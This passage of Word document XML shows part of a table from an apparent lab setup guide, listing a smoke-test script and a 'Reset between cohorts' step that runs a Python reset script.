            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>./smoke_test.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Reset between cohorts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>python3 reset_lab.py --apply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